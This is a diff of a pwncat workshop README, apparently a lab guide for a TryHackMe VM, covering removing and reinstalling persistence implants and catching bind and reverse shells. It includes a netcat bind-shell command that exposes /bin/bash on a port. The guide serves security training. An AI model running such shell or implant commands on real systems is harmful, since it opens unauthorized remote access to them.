DanaEpp/pwncat-workshop/README.md

 1. From local-mode, enter: `run implant list`.
 You should be able to see what implants you have left.
 2. Now let's remove any implants: `run implant remove`.
 You will have the option to remove individual implants, or all of them.
 Once done, the channel will close your connection.
 3. Try reconnecting with your keys.
 It SHOULD fail.
-4. Now log back in using `pwncat-cs shell@vm.thm`.... or for extra points if you have a second session open, reinstall the implant so you can connect back using `pwncat-cs shell@vm.thm -i ./targ`
+4. Now log back in using `pwncat-cs shell@vm.thm`.... or for extra points if you have a second session open, reinstall the implant so you can connect back using `pwncat-cs shell@vm.thm -i ./tmpkey`

 # Bind and reverse shells
 OK, so we showed how to use pwncat to connect via SSH.
 But its also really useful in catching shells.

-For the next couple of exercises, we will use [revshells.com](https://www.revshells.com) to generate some of our shell code.

 Let's start with a bind shell:
-1. Connect to the THM vm using SSH (not pwncat): `ssh shell@vm.thm -i ./targ`
+1. Connect to the THM vm using SSH (not pwncat): `ssh shell@vm.thm -i ./tmpkey`
 2. Start a bind shell using netcat on your favorite port: `nc -lvnp 4444 -e /bin/bash`
 3. In another console window, connect to the bind shell using pwncat: `pwncat-cs vm.thm 4444`
 4. Switch to remote-mode: `CTRL+D`